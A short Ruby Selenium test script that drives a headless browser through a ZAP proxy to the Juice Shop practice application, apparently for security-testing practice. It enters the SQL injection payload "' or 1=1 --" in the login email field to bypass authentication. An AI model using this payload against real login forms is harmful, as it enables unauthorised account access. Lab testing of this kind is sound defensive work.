# Generated by Selenium IDE
require 'selenium-webdriver'
require 'json'
describe 'Sqlinjection' do
  before(:each) do    
    options = Selenium::WebDriver::Options.chrome
    options.add_argument('--headless')
    options.add_argument('--no-sandbox')
    options.add_argument('--disable-gpu')
    options.add_argument('--disable-dev-shm-usage')
    options.add_argument('--proxy=zap:8090')
    @driver = Selenium::WebDriver.for :chrome, options: options
    @vars = {}
  end
  after(:each) do
    @driver.quit
  end
  it 'sqlinjection' do
    @driver.get('http://juice_shop:3000/')    
    element = @driver.find_element(:id, 'navbarAccount')
    @driver.execute_script("arguments[0].click();", element)
    @driver.find_element(:css, '#navbarLoginButton > .mat-icon').click
    @driver.find_element(:id, 'email').send_keys('\' or 1=1 --')
    @driver.find_element(:id, 'password').send_keys('123')    
    element = @driver.find_element(:css, '#loginButton > .mat-button-wrapper')
    @driver.execute_script("arguments[0].click();", element)
    print(" --- SQLINJECTION successed ---")
  end
end
